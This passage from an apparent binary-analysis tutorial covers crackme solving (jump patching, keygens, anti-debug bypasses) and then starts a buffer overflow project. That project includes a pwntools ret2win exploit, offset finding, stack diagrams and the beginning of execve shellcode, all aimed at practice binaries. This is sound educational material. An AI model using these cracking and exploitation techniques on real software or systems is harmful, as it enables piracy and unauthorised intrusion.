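To patch a real file, read it with `open(path, "rb").read()`, apply the function at the file offset of the jump, and write the result to a new file so the original stays intact.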

Questions:

  • What's the difference between JE and JNE?
  • How do you find the password comparison in decompiled code?
  • What are common string comparison functions?

Learning milestones:

  1. Solve easy crackmes → Find obvious password checks
  2. Understand algorithms → XOR, hashing, encoding
  3. Write keygens → Reverse the algorithm
  4. Bypass protections → Handle obfuscation

The Core Question You're Answering

How do you systematically reverse engineer authentication mechanisms, understand their underlying algorithms, and create tools to bypass or generate valid credentials, all without source code?

This project teaches the complete reverse engineering workflow: from initial binary exploration to algorithm extraction to automated solution generation. You'll learn both the "quick and dirty" approach (patching) and the "deep understanding" approach (keygen writing).

Concepts You Must Understand First

1. String References and Cross-References

Most crackmes leave clues in strings ("Correct!", "Wrong password"). Learning to trace from strings to code is your first reverse engineering skill.

Guiding Questions:

  • Why do string references often lead directly to validation logic?
  • How do you distinguish between format strings and actual password strings?
  • What happens when strings are obfuscated or encrypted at runtime?

Book Reference: "Practical Binary Analysis" Ch. 5.4 - Finding Main Manually

2. Comparison Operations in Assembly

Password checks ultimately boil down to comparisons: cmp, test, sub followed by conditional jumps. Recognizing these patterns is essential.

Guiding Questions:

  • What's the difference between cmp rax, rbx and test rax, rax?
  • How do je, jne, jz, jnz relate to the zero flag?
  • sub and cmp set the same flags; what does sub do that cmp does not?

Book Reference: "Low-Level Programming" Ch. 5 - Arithmetic and Logical Operations
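
A small model of the zero flag can make these questions concrete. This is a sketch of ZF only (the other flags are ignored), with hypothetical helper names: cmp computes a - b and discards the result, test computes a & b and discards the result, and sub computes the same difference as cmp but keeps it.

```python
MASK64 = (1 << 64) - 1  # model 64-bit registers


def zf_after_cmp(a: int, b: int) -> bool:
    """ZF after `cmp a, b`: set when a - b == 0; the difference is discarded."""
    return ((a - b) & MASK64) == 0


def zf_after_test(a: int, b: int) -> bool:
    """ZF after `test a, b`: set when a & b == 0; the result is discarded."""
    return (a & b & MASK64) == 0


def sub(a: int, b: int):
    """`sub a, b`: same ZF as cmp, but the destination receives the difference."""
    result = (a - b) & MASK64
    return result, result == 0


def je_taken(zf: bool) -> bool:    # je and jz are the same instruction
    return zf


def jne_taken(zf: bool) -> bool:   # jne and jnz are the same instruction
    return not zf


# strcmp() returned 0 (strings equal), then `test eax, eax`
zf = zf_after_test(0, 0)
print(je_taken(zf), jne_taken(zf))   # True False
```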

3. Control Flow Manipulation (Patching)

The simplest bypass is changing a conditional jump (je → jne) or removing checks entirely (NOP padding).

Guiding Questions:

  • What's the opcode for jne vs je, and how do you swap them?
  • Why is NOPing (0x90) preferred over zeroing bytes?
  • How do you ensure patch size matches original instruction size?

Book Reference: "Hacking: The Art of Exploitation" Ch. 3 - Exploitation

4. Common Validation Algorithms

Crackmes use predictable patterns: XOR encoding, simple hashing (MD5/SHA), base64, character manipulation.

Guiding Questions:

  • How do you recognize XOR in assembly (repeated xor with constants)?
  • What does a SHA256 implementation look like in decompiled code?
  • How do you distinguish encryption from simple obfuscation?

Book Reference: "Reversing: Secrets of Reverse Engineering" Ch. 5 - Applied Reverse Engineering
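
One practical way to recognize a standard algorithm is to scan the binary for its well-known constants. The sketch below searches a byte blob for three signatures: the first eight bytes of the AES S-box, the first SHA-256 initial hash word, and the first MD5/SHA-1 initialization word (the latter two stored as little-endian dwords, as they usually appear in x86 code and data). The signature names and the function are illustrative; a hit is a hint to investigate, not proof.

```python
import struct

SIGNATURES = {
    "aes_sbox": bytes.fromhex("637c777bf26b6fc5"),   # S-box starts 63 7c 77 7b ...
    "sha256_h0": struct.pack("<I", 0x6A09E667),       # first SHA-256 initial hash word
    "md5_sha1_init": struct.pack("<I", 0x67452301),   # first MD5 / SHA-1 init word
}


def find_crypto_constants(blob: bytes) -> dict:
    """Map signature name -> first offset at which it occurs in blob."""
    hits = {}
    for name, signature in SIGNATURES.items():
        position = blob.find(signature)
        if position != -1:
            hits[name] = position
    return hits


# Made-up blob with an S-box prefix planted at offset 16
sample = bytes(16) + bytes.fromhex("637c777bf26b6fc5") + b"\x90" * 4
print(find_crypto_constants(sample))   # {'aes_sbox': 16}
```

On a real target you would pass `open(path, "rb").read()` and then look up cross-references to the reported offsets in your disassembler.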

5. Keygen Development

Once you understand the algorithm, you invert it: if validation computes transform(input) == stored_value and transform is reversible, your keygen computes input = inverse_transform(stored_value). A true one-way hash has no such inverse, which is why the questions below separate the two cases.

Guiding Questions:

  • What algorithms are reversible (XOR, Caesar cipher) vs irreversible (SHA256)?
  • How do you handle one-way hashes (hint: you can't reverse them)?
  • When is it easier to brute force than to write a perfect keygen?

Book Reference: "Reversing: Secrets of Reverse Engineering" Ch. 5
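
For the reversible case, a single-byte XOR is the simplest illustration, because XOR is its own inverse. The key, the stored blob, and the function names below are hypothetical; they stand in for values you would recover from the disassembly.

```python
KEY = 0x55  # hypothetical single-byte XOR key found in the check routine


def encode(data: bytes, key: int = KEY) -> bytes:
    """The transform the crackme applies to the user's input."""
    return bytes(b ^ key for b in data)


def check(serial: bytes, stored: bytes) -> bool:
    """Model of the validation: encode(input) == stored blob."""
    return encode(serial) == stored


def keygen(stored: bytes) -> bytes:
    """XOR undoes itself, so applying the same transform to the blob recovers the input."""
    return encode(stored)


stored = encode(b"s3cr3t")   # stands in for the blob found in .rodata
serial = keygen(stored)
print(serial, check(serial, stored))   # b's3cr3t' True
```

If the transform were a cryptographic hash instead, no `keygen` of this shape exists; the remaining options are brute force over a small input space or patching the comparison.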

6. Anti-Debugging Basics

Some crackmes detect debuggers using ptrace, timing checks, or IsDebuggerPresent(). You'll need to recognize and bypass these.

Guiding Questions:

  • How does the ptrace(PTRACE_TRACEME) trick detect debuggers?
  • What's a timing-based anti-debug check and how do you defeat it?
  • Why do debuggers change program behavior even without breakpoints?

Book Reference: "Practical Malware Analysis" Ch. 16 - Anti-Debugging

7. Binary Patching Tools and Techniques

You'll need to modify binaries with hex editors, dd, or specialized tools like radare2 or Binary Ninja.

Guiding Questions:

  • How do you find the file offset of a memory address in an ELF/PE binary?
  • What's the difference between patching in-memory vs on-disk?
  • How do you verify your patch didn't corrupt the binary?

Book Reference: "Practical Binary Analysis" Ch. 7 - Simple Code Injection
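
For the first question, the ELF rule is: find the loadable segment that contains the virtual address, then compute offset = vaddr - segment_vaddr + segment_file_offset. The sketch below assumes you have already copied the LOAD segments out of `readelf -lW` output; the `Segment` type and the sample values are hypothetical.

```python
from typing import List, NamedTuple


class Segment(NamedTuple):
    vaddr: int    # virtual address where the segment is mapped
    offset: int   # file offset where the segment's bytes begin
    filesz: int   # number of bytes the segment occupies in the file


def vaddr_to_offset(segments: List[Segment], vaddr: int) -> int:
    """Translate a virtual address to a file offset using its containing segment."""
    for seg in segments:
        if seg.vaddr <= vaddr < seg.vaddr + seg.filesz:
            return vaddr - seg.vaddr + seg.offset
    raise ValueError(f"{vaddr:#x} is not backed by file contents")


# Hypothetical LOAD segments of a non-PIE binary
segments = [
    Segment(vaddr=0x400000, offset=0x0000, filesz=0x0600),
    Segment(vaddr=0x401000, offset=0x1000, filesz=0x2000),
]
print(hex(vaddr_to_offset(segments, 0x401234)))   # 0x1234
```

The result is the value you would pass as `seek=` to dd (in decimal) or jump to in a hex editor. Addresses that fall in the zero-filled tail of a segment (beyond filesz) have no file offset, which is why the function raises for them.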

8. Input Validation and User Input Flow

Understanding where user input enters (stdin, argv, environment variables) and how it's processed helps you trace to the validation logic.

Guiding Questions:

  • How do you identify scanf, fgets, or read calls in disassembly?
  • Where does command-line input (argv) appear in the program state?
  • How do you trace tainted input through the program?

Book Reference: "Computer Systems: A Programmer's Perspective" Ch. 8.4 - Process Control

Questions to Guide Your Design

  1. Given a crackme that accepts a serial number, what's your systematic process to find the validation function? Consider strings, imports, control flow, and data flow.

  2. When is patching preferable to writing a keygen, and vice versa? Think about time investment, learning value, and reusability.

  3. How would you approach a crackme that generates a unique serial for each user's machine (HWID-based)? Consider what machine identifiers it might use (MAC address, disk serial, CPU ID).

  4. What strategies help when the password check is heavily obfuscated (no strings, indirect jumps)? Think about dynamic analysis, symbolic execution, and emulation.

  5. How do you build a test suite for your keygen to ensure it works for all inputs? Consider edge cases, random testing, and comparing against the original binary.

  6. When a crackme uses a cryptographic hash (SHA256), what are your options since you can't reverse it? Think about rainbow tables, brute force, or patching the comparison.

  7. How would you document your reverse engineering process so others can learn from your analysis? Consider annotated disassembly, step-by-step walkthroughs, and algorithm explanations.

  8. What ethical and legal considerations apply to cracking software, even in a learning context? Think about responsible disclosure, CTF vs commercial software, and intent.

Thinking Exercise

Before attempting any crackmes, complete this exercise:

  1. Manual Algorithm Reversal: Here's a simple validation function in C:
    int validate(char *input) {
        int sum = 0;
        for (int i = 0; i < strlen(input); i++) {
            sum += input[i] ^ 0x42;
        }
        return sum == 0x1337;
    }
    
    • Compile it (without optimization: gcc -O0)
    • Disassemble it with objdump or load in Ghidra
    • Identify the loop structure in assembly
    • Find the XOR operation and the constant 0x42
    • Find the final comparison with 0x1337
    • Write a keygen in Python that generates valid inputs
  2. Patch Practice: Create a simple password checker:
    #include <stdio.h>
    #include <string.h>
    int main() {
        char pass[32];
        printf("Password: ");
        scanf("%s", pass);
        if (strcmp(pass, "secret") == 0) {
            printf("Correct!\n");
        } else {
            printf("Wrong!\n");
        }
    }
    
    • Compile it
    • Find the strcmp call in assembly (use objdump -d or Ghidra)
    • Note the conditional jump after the comparison
    • Patch the binary three ways:
      • Method 1: Change jne to je (swap success/failure)
      • Method 2: NOP out the entire check
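      • Method 3: Change the comparison so it always reports equal, e.g. replace test eax, eax with cmp eax, eax (both encode in 2 bytes, so the patch fits; cmp rax, rax would need 3)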
    • Verify each patch works
  3. Trace User Input: Take this program:
    int main(int argc, char **argv) {
        if (argc != 2) return 1;
        int key = atoi(argv[1]);
        key = (key * 13) + 37;
        key ^= 0xDEADBEEF;
        if (key == 0x12345678) {
            printf("Win!\n");
        }
    }
    
    • Trace argv[1] through each transformation
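    • Write the mathematical inverse. The arithmetic wraps at 32 bits, so plain division by 13 is wrong in general; multiply by the modular inverse of 13 instead: key = ((target ^ 0xDEADBEEF) - 37) * inverse(13) mod 2^32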
    • Implement in Python and find the winning input
    • Verify by running the original binary
  4. Anti-Debug Detection: Create a program with ptrace anti-debugging:
    #include <sys/ptrace.h>
    #include <stdio.h>
    int main() {
        if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1) {
            printf("Debugger detected!\n");
            return 1;
        }
        printf("Not debugging\n");
        // rest of program
    }
    
    • Try running it under GDB (it will detect the debugger)
    • Bypass it by:
      • Method 1: Patching the ptrace call to always return 0
      • Method 2: Setting a breakpoint before ptrace and changing the return value
      • Method 3: Using LD_PRELOAD to hook ptrace
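
Once you have worked exercises 1 and 3 by hand, a sketch like the following can check your answers. It makes two assumptions: the compiled binaries wrap on 32-bit overflow (typical for unoptimized x86-64 builds, although signed overflow is formally undefined in C), and the serial for exercise 1 may be any printable non-space ASCII. All function names are illustrative.

```python
MASK32 = 0xFFFFFFFF


def validate_sum(serial: bytes) -> bool:
    """Python port of exercise 1: the sum of (byte ^ 0x42) must equal 0x1337."""
    return sum(b ^ 0x42 for b in serial) == 0x1337


def keygen_sum(target: int = 0x1337, key: int = 0x42) -> bytes:
    """Greedy keygen: keep taking the printable byte with the largest usable value."""
    # Per-character contribution (c ^ key) mapped back to its printable character c
    value_to_char = {c ^ key: c for c in range(0x21, 0x7F) if c ^ key}
    values = sorted(value_to_char, reverse=True)
    serial, remaining = bytearray(), target
    while remaining:
        v = next(v for v in values if v <= remaining)  # value 1 ('C') always fits
        serial.append(value_to_char[v])
        remaining -= v
    return bytes(serial)


def transform(key: int) -> int:
    """Exercise 3 forward direction, with the 32-bit wraparound made explicit."""
    return (((key * 13) + 37) & MASK32) ^ 0xDEADBEEF


def invert(target: int) -> int:
    """Undo transform(): XOR, subtract, multiply by 13's inverse modulo 2**32."""
    inv13 = pow(13, -1, 1 << 32)   # exists because 13 is odd (needs Python 3.8+)
    return (((target ^ 0xDEADBEEF) - 37) * inv13) & MASK32


def as_signed32(x: int) -> int:
    """Reinterpret an unsigned 32-bit value as the int that atoi() has to produce."""
    return x - (1 << 32) if x & 0x80000000 else x


print(keygen_sum().decode())                 # one valid serial for exercise 1
print(as_signed32(invert(0x12345678)))       # decimal argument for exercise 3
```

The greedy keygen produces only one of many valid serials; the modular inverse, by contrast, gives the unique 32-bit key because multiplication by an odd number is a bijection modulo 2^32.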

The Interview Questions They'll Ask

  1. "Walk me through your methodology for solving an unknown crackme from start to finish." Expected: Run it → check strings → find validation → understand algorithm → patch or keygen → verify success.

  2. "What's the difference between je and jne at the opcode level, and how would you patch one to the other?" Expected: je (0x74), jne (0x75) in the short form; the near forms are 0F 84 and 0F 85. They differ by one bit. Patch by changing the byte at that offset.

  3. "You find this assembly: xor eax, eax; test eax, eax; je 0x401234. What's happening and is there a shortcut?" Expected: xor eax, eax zeroes eax, test sets zero flag, je always jumps. Shortcut: jmp 0x401234.

  4. "How would you approach a crackme that checks username AND serial number together (no valid serial without the right username)?" Expected: Trace both inputs, find where they're combined (concatenation, XOR), understand the relationship, write a keygen that takes username as input.

  5. "Explain three different patching strategies and when you'd use each." Expected: (1) Invert jump: quick but obvious; (2) NOP the check: clean; (3) Change comparison target: stealthy. Use based on goals (speed vs stealth).

  6. "A crackme uses MD5(serial) == 'abc123...'. Can you write a keygen? What are your options?" Expected: Can't reverse MD5. Options: brute force (if short), rainbow table lookup, or patch the comparison.

  7. "How do you identify a validation loop (character-by-character check) in disassembly?" Expected: Look for loop structures (counter increment, conditional jump back), array indexing, character-wise operations.

  8. "What's the 'cyclic pattern' technique and how is it useful in crackmes?" Expected: Generates unique substrings to identify buffer positions. Useful for finding offset to critical data in password buffers.

  9. "You've reversed the algorithm but your keygen produces 'valid' serials that the program rejects. What went wrong?" Expected: Likely issues: integer overflow, endianness, off-by-one errors, missing constraints (e.g., serial must be printable ASCII).

  10. "Describe the legal and ethical boundaries of reverse engineering copy protection." Expected: CTF/educational crackmes are legal. Commercial software varies by jurisdiction (DMCA, EU directives). Intent matters. Always use isolated VMs.

Books That Will Help

| Topic | Book | Chapter/Section |
|---|---|---|
| Reverse Engineering Fundamentals | "Reversing: Secrets of Reverse Engineering" | Ch. 1-3 (Foundations, RE Process) |
| Applied Crackme Solving | "Reversing: Secrets of Reverse Engineering" | Ch. 5 (Applied RE) |
| x86/x64 Comparison Operations | "Low-Level Programming" | Ch. 5.3 (Conditional Jumps) |
| Control Flow in Assembly | "Low-Level Programming" | Ch. 6 (Control Flow) |
| String Analysis | "Practical Binary Analysis" | Ch. 5.4 (Finding Functions) |
| Binary Patching Techniques | "Practical Binary Analysis" | Ch. 7 (Code Injection) |
| Debugger Usage (GDB) | "Hacking: The Art of Exploitation" | Ch. 2 (Programming) |
| Anti-Debugging Techniques | "Practical Malware Analysis" | Ch. 16 (Anti-Debugging) |
| Common Crypto Algorithms | "Serious Cryptography" | Ch. 1-6 (Hashing, Encryption) |
| Assembly Language Basics | "Computer Systems: A Programmer's Perspective" | Ch. 3 (Machine-Level Representation) |
| Stack and Calling Conventions | "Computer Systems: A Programmer's Perspective" | Ch. 3.7 (Procedures) |
| Tool Usage (Ghidra) | "Ghidra Software Reverse Engineering for Beginners" | Ch. 4-6 (Analysis Features) |
| Input Tracing | "Computer Systems: A Programmer's Perspective" | Ch. 8.4 (Process Control) |
| Opcode Reference | "Low-Level Programming" | Appendix A (x86-64 Instruction Reference) |
| Hex Editing and Binary Structure | "Practical Binary Analysis" | Ch. 2 (Binary Formats) |

Project 7: Buffer Overflow Exploitation

  • File: LEARN_BINARY_ANALYSIS.md
  • Main Programming Language: C (targets), Python (exploits)
  • Alternative Programming Languages: Assembly for shellcode
  • Coolness Level: Level 5: Pure Magic (Super Cool)
  • Business Potential: 1. The "Resume Gold"
  • Difficulty: Level 3: Advanced
  • Knowledge Area: Binary Exploitation / Memory Corruption
  • Software or Tool: GDB, pwntools, checksec
  • Main Book: "Hacking: The Art of Exploitation" by Jon Erickson

What you'll build: Working exploits for buffer overflow vulnerabilities, progressing from simple stack smashing to bypassing ASLR and stack canaries.

Why it teaches binary analysis: Understanding exploitation gives you insight into why security mitigations exist and how low-level memory works.

Core challenges you'll face:

  • Finding the offset → maps to pattern generation, EIP/RIP control
  • Controlling execution → maps to return address overwrite
  • Bypassing NX → maps to return-to-libc, ROP
  • Bypassing ASLR → maps to info leaks, partial overwrite

Resources for key challenges:

Key Concepts:

  • Stack Layout: "Hacking: Art of Exploitation" Ch. 2
  • Shellcode: "Hacking: Art of Exploitation" Ch. 5
  • Return-Oriented Programming: "Practical Binary Analysis" Ch. 10

Difficulty: Advanced Time estimate: 3-4 weeks Prerequisites: Projects 1-6, solid C and assembly

Real world outcome:

from pwn import *

# Connect to target
p = process('./vulnerable')

# Find offset with pattern
offset = 72

# Build payload
payload = b'A' * offset           # Fill buffer
payload += p64(0x401337)          # Overwrite return address with win()

# Send payload
p.sendline(payload)

# Get shell!
p.interactive()

# Output:
# [*] Switching to interactive mode
# $ whoami
# root
# $ cat flag.txt
# FLAG{buffer_overflow_mastered}

Implementation Hints:

Progression:

  1. ret2win: Overwrite return address to call win() function
  2. ret2shellcode: Jump to shellcode on stack (no NX)
  3. ret2libc: Return to system("/bin/sh") (bypass NX)
  4. ROP chain: Chain gadgets for complex operations
  5. GOT overwrite: Hijack function pointers
  6. Format string: Arbitrary read/write

Finding offset:

from pwn import *

# Generate cyclic pattern
pattern = cyclic(200)
# Feed to program, get crash address
# Use cyclic_find to get offset
offset = cyclic_find(0x61616168)  # 'haaa' in little-endian

Key questions:

  • How do you find the offset to the return address?
  • What's the difference between 32-bit and 64-bit exploitation?
  • How do you find useful libc functions when ASLR is enabled?

Learning milestones:

  1. Control EIP/RIP → Overwrite return address
  2. Execute shellcode → Spawn a shell (no NX)
  3. ROP chains → Bypass NX with gadgets
  4. Leak addresses → Bypass ASLR

The Core Question You're Answering

How do you exploit unsafe memory operations to hijack program control flow, execute arbitrary code, and bypass modern security mitigations, all by understanding the precise layout of memory at runtime?

This project bridges theory and practice: you'll see how textbook stack diagrams become real exploitable conditions, and how security features (NX, ASLR, stack canaries) force increasingly sophisticated attack techniques.

Concepts You Must Understand First

1. The Stack Memory Layout

The stack grows downward (high to low addresses) and stores local variables, saved registers, and return addresses. Understanding this layout is essential for exploitation.

High addresses
+------------------+
| Command-line args|
| (argv, envp)     |
+------------------+
| Stack            |
| (grows down)     |
|                  |
|  +-----------+   |  <-- Current function's stack frame
|  | Local vars|   |
|  | (buffer)  |   |
|  +-----------+   |
|  | Saved RBP |   |  <-- Frame pointer (base of previous frame)
|  +-----------+   |
|  | Ret addr  |   |  <-- Return address (TARGET FOR OVERWRITE)
|  +-----------+   |
|  | Arguments |   |
|  +-----------+   |
|      ...         |
|                  |
+------------------+
| Heap             |
| (grows up)       |
+------------------+
| .bss (uninit)    |
+------------------+
| .data (init)     |
+------------------+
| .text (code)     |
+------------------+
Low addresses

Guiding Questions:

  • Why does the stack grow downward while arrays grow upward (creating overflow)?
  • What's stored between a buffer and the return address?
  • How does the saved frame pointer (RBP) help identify stack frame boundaries?

Book Reference: "Computer Systems: A Programmer's Perspective" Ch. 3.7 - Procedures

2. Buffer Overflow Mechanics

When strcpy(buffer, user_input) copies more data than the buffer can hold, it overwrites adjacent memory, including the saved RBP and the return address.

Guiding Questions:

  • Why are functions like gets(), strcpy(), and sprintf() dangerous?
  • What's the difference between a stack overflow (exhausting stack space, e.g. through runaway recursion) and stack smashing (writing past a stack buffer to corrupt saved data)?
  • How do you calculate the exact offset from buffer start to return address?

Book Reference: "Hacking: The Art of Exploitation" Ch. 2.5 - Buffer Overflows
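
For the last question, the arithmetic follows directly from the stack diagram, assuming a frame-pointer-based frame with no canary: if the disassembly shows the buffer starting at [rbp - N], the return address sits N bytes up (to the saved RBP) plus one pointer further. The helper below is a hypothetical sketch of that calculation; always confirm the distance in the disassembly, because compilers may add padding.

```python
def offset_to_return_address(buffer_rbp_distance: int, pointer_size: int = 8) -> int:
    """Bytes from buffer[0] to the saved return address.

    buffer_rbp_distance: N where the buffer starts at [rbp - N] (or [ebp - N]).
    pointer_size: 8 on x86-64, 4 on 32-bit x86 (size of the saved frame pointer).
    """
    return buffer_rbp_distance + pointer_size   # skip the locals, then the saved RBP


# char buffer[64] placed at [rbp - 0x40] in a 64-bit binary
print(offset_to_return_address(0x40))                   # 72
# Hypothetical 32-bit frame with the buffer at [ebp - 0x48]
print(offset_to_return_address(0x48, pointer_size=4))   # 76
```

The first result matches the `offset = 72` used in the pwntools example earlier in this project for a 64-byte buffer.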

3. Return Address Hijacking

The return address (pushed by call, popped by ret) determines where execution goes after a function. Overwriting it redirects control flow.

Guiding Questions:

  • What does the ret instruction do at the assembly level?
  • Why must your payload preserve stack alignment (especially on x64)?
  • What happens if you overwrite the return address with an invalid address?

Book Reference: "Computer Systems: A Programmer's Perspective" Ch. 3.7.3 - Data Transfer

4. Shellcode Development

Shellcode is position-independent assembly code that spawns a shell or executes commands. It must avoid null bytes (which terminate string copies).

Guiding Questions:

  • Why does shellcode use execve("/bin/sh", NULL, NULL) instead of system("/bin/sh")?
  • How do you write position-independent code (no hardcoded addresses)?
  • What techniques eliminate null bytes (e.g., xor eax, eax instead of mov eax, 0)?

Book Reference: "Hacking: The Art of Exploitation" Ch. 5 - Shellcode
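
Checking a payload for bytes that would truncate it is easy to automate. The sketch below reports the offsets of "bad" bytes and compares the two encodings named in the question above. The byte strings are hand-assembled for illustration (verify them with your own assembler), and the 24-byte execve("/bin//sh") sequence is one common variant, not the only one.

```python
def bad_byte_offsets(shellcode: bytes, bad: bytes = b"\x00") -> list:
    """Offsets of bytes that would cut the payload short (NUL by default)."""
    return [i for i, b in enumerate(shellcode) if b in bad]


mov_eax_0 = bytes.fromhex("b800000000")   # mov eax, 0   (imm32 is four NUL bytes)
xor_eax_eax = bytes.fromhex("31c0")       # xor eax, eax (same effect, no NULs)

# Hand-assembled execve("/bin//sh", NULL, NULL) for x86-64 Linux
execve_sc = bytes.fromhex(
    "4831f6"                  # xor rsi, rsi
    "48f7e6"                  # mul rsi          (RAX = RDX = 0)
    "48bb2f62696e2f2f7368"    # mov rbx, "/bin//sh"
    "56"                      # push rsi         (NUL terminator)
    "53"                      # push rbx
    "54"                      # push rsp
    "5f"                      # pop rdi
    "b03b"                    # mov al, 0x3b     (execve)
    "0f05"                    # syscall
)

print(bad_byte_offsets(mov_eax_0))     # [1, 2, 3, 4]
print(bad_byte_offsets(xor_eax_eax))   # []
print(bad_byte_offsets(execve_sc))     # []
```

Pass a longer `bad` set when the input function has other terminators, for example `b"\x00\n"` for gets() or `b"\x00 \t\n"` for scanf("%s").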

5. NX (No-Execute) Protection

Modern systems mark the stack as non-executable, preventing shellcode execution. This forces attackers to use existing code (return-to-libc, ROP).

Guiding Questions:

  • How does the NX bit work at the hardware level (page table permissions)?
  • Why can't you just mark the stack executable from your exploit?
  • What's the difference between DEP (Windows) and NX (Linux)?

Book Reference: "Practical Binary Analysis" Ch. 10.2 - Code-Reuse Attacks
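
On Linux, whether a binary asks for a non-executable stack is recorded in its PT_GNU_STACK program header, which is one of the things tools such as checksec report. The sketch below reads that header from a 64-bit little-endian ELF using only the standard library; the function name is an assumption, and returning None when the header is absent is a simplification (the effective default then depends on the kernel and architecture).

```python
import struct
from typing import Optional

PT_GNU_STACK = 0x6474E551   # program header type that carries the stack permissions
PF_X = 0x1                  # "executable" bit in p_flags


def stack_is_executable(elf: bytes) -> Optional[bool]:
    """True/False from PT_GNU_STACK, or None if the header is missing."""
    if elf[:4] != b"\x7fELF" or elf[4] != 2 or elf[5] != 1:
        raise ValueError("expected a 64-bit little-endian ELF")
    (e_phoff,) = struct.unpack_from("<Q", elf, 0x20)             # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 0x36)  # entry size and count
    for i in range(e_phnum):
        # p_type and p_flags are the first two 32-bit fields of an ELF64 program header
        p_type, p_flags = struct.unpack_from("<II", elf, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None
```

Usage would look like `stack_is_executable(open("vuln", "rb").read())`: a binary built with `-z execstack` should report True, and a default build should report False.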

6. ASLR (Address Space Layout Randomization)

ASLR randomizes the base addresses of stack, heap, and libraries, making hardcoded addresses unreliable. Defeating it requires information leaks.

Guiding Questions:

  • What parts of memory are randomized (stack, heap, libraries)?
  • Why is the code section (.text) often NOT randomized in binaries without PIE?
  • How do format string bugs or read overflows leak addresses?

Book Reference: "Practical Binary Analysis" Ch. 10.3 - Randomization-Based Defenses
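
An information leak defeats ASLR because randomization shifts a whole library by one base value: offsets between symbols inside libc stay fixed. Given one leaked runtime address and that symbol's offset within the library, everything else follows by subtraction and addition. The offsets and the leaked address below are made-up numbers; real ones come from the target's exact libc (for example via `readelf -s`).

```python
def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Recover the library load base from one leaked symbol address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # Load bases are page-aligned; anything else means a wrong offset or wrong libc
        raise ValueError(f"base {base:#x} is not page-aligned")
    return base


# Hypothetical offsets inside the target's libc
PUTS_OFFSET = 0x80E50
SYSTEM_OFFSET = 0x50D70

leaked_puts = 0x7F3A1C280E50          # made-up value read from puts' GOT entry
base = libc_base_from_leak(leaked_puts, PUTS_OFFSET)
print(hex(base))                      # 0x7f3a1c200000
print(hex(base + SYSTEM_OFFSET))      # 0x7f3a1c250d70
```

The page-alignment check is a cheap sanity test that catches most mismatched-libc mistakes before you send a second-stage payload.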

7. Stack Canaries

Canaries are random values placed between the buffer and return address. Before returning, the program checks if the canary is intact; if not, it aborts.

Guiding Questions:

  • Where exactly is the canary placed in the stack frame?
  • How are canaries generated (random, constant, TLS-based)?
  • Can you bypass canaries by leaking their value or using partial overwrites?

Book Reference: "Computer Systems: A Programmer's Perspective" Ch. 3.10.3 - Stack Corruption Detection
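
If the canary value can be leaked, the overflow has to write it back unchanged on the way to the return address. The sketch below lays out such a payload for the common x86-64 arrangement (buffer, canary, saved RBP, return address); the function name, the distances, and the canary value are hypothetical, and the real layout must be read from the target's disassembly.

```python
import struct


def payload_with_canary(buf_to_canary: int, canary: int, ret_addr: int,
                        saved_rbp: int = 0) -> bytes:
    """Padding up to the canary, then the leaked canary, a saved RBP, and the new return address."""
    return (
        b"A" * buf_to_canary
        + struct.pack("<Q", canary)      # must match the leaked value exactly
        + struct.pack("<Q", saved_rbp)   # often irrelevant, but occupies 8 bytes
        + struct.pack("<Q", ret_addr)    # where ret will jump
    )


# Made-up values: canary 72 bytes past buffer[0], leaked as 0x1122334455667700
payload = payload_with_canary(72, 0x1122334455667700, 0x401337)
print(len(payload))   # 96
```

On Linux with glibc the canary's lowest byte is normally 0x00, which stops string functions from leaking it by accident and also means strcpy-style overflows cannot write it back; that constraint decides which vulnerable function makes this technique usable.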

8. Pwntools and Exploit Development

Pwntools is a Python library for writing exploits. It handles process interaction, payload generation, and address packing.

Guiding Questions:

  • What's the difference between p32() and p64() for packing addresses?
  • How does cyclic() help find the exact overflow offset?
  • When should you use process() vs remote() for local vs remote targets?

Book Reference: Official pwntools documentation (docs.pwntools.com)
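
To see what address packing does without installing pwntools, the standard library's struct module is enough. The two helpers below are simplified stand-ins that borrow the pwntools names; they are assumed to match pwntools' default little-endian behaviour for in-range values, and are not the library's implementation.

```python
import struct


def p32(value: int) -> bytes:
    """Pack as 4 little-endian bytes (32-bit targets)."""
    return struct.pack("<I", value & 0xFFFFFFFF)


def p64(value: int) -> bytes:
    """Pack as 8 little-endian bytes (64-bit targets)."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


print(p32(0x08048456).hex())   # 56840408
print(p64(0x401337).hex())     # 3713400000000000

# Same shape as the ret2win payload shown earlier in this project
payload = b"A" * 72 + p64(0x401337)
print(len(payload))            # 80
```

The five zero bytes in the packed 64-bit address are why 64-bit return addresses are hard to deliver through strcpy(): the copy stops at the first NUL, so the address usually has to be the last thing in the payload.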

Questions to Guide Your Design

  1. How do you determine the exact offset from the buffer start to the return address without source code? Consider pattern generation, crash analysis, and GDB inspection.

  2. When NX is enabled, what existing code can you reuse to achieve your goals? Think about libc functions, PLT entries, and gadgets.

  3. How would you leak a libc address to defeat ASLR in a two-stage exploit? Consider using puts() to print GOT entries.

  4. What strategies work when you can only overflow a small number of bytes (not enough for shellcode)? Think about partial overwrites, ROP, or pointer manipulation.

  5. How do you write shellcode that works regardless of where it's placed in memory? Consider relative addressing, stack pivoting, and position-independent techniques.

  6. When would you choose ret2libc over ROP, or vice versa? Think about complexity, reliability, and available gadgets.

  7. How do you test your exploits reliably when ASLR is enabled locally? Consider disabling ASLR (echo 0 > /proc/sys/kernel/randomize_va_space) or handling it properly.

  8. What debugging workflow helps when your exploit crashes the program in unexpected ways? Think about core dumps, GDB breakpoints, and payload inspection.

Thinking Exercise

Before writing any exploits, complete these exercises:

  1. Manual Stack Diagram: Draw the complete stack layout for this function call:
    void vulnerable(char *input) {
        char buffer[64];
        strcpy(buffer, input);  // No bounds checking!
    }
    
    int main(int argc, char **argv) {
        if (argc > 1) {
            vulnerable(argv[1]);
        }
        return 0;
    }
    
    • Compile with gcc -fno-stack-protector -z execstack -o vuln vuln.c
    • Run in GDB with breakpoint in vulnerable() after the strcpy()
    • Print the stack as 8-byte words from the stack pointer upward: x/20gx $rsp
    • Identify: buffer location, saved RBP, return address
    • Calculate the offset: how many bytes from buffer[0] to return address?
  2. Shellcode Analysis: Examine this x64 shellcode:
    xor rsi, rsi         ; RSI = NULL (argv)
    mul rsi              ; RAX = RDX = 0 (RDX = envp = NULL)
    mov rbx, 0x68732f2f6e69622f  ; "/bin//sh" as a little-endian qword
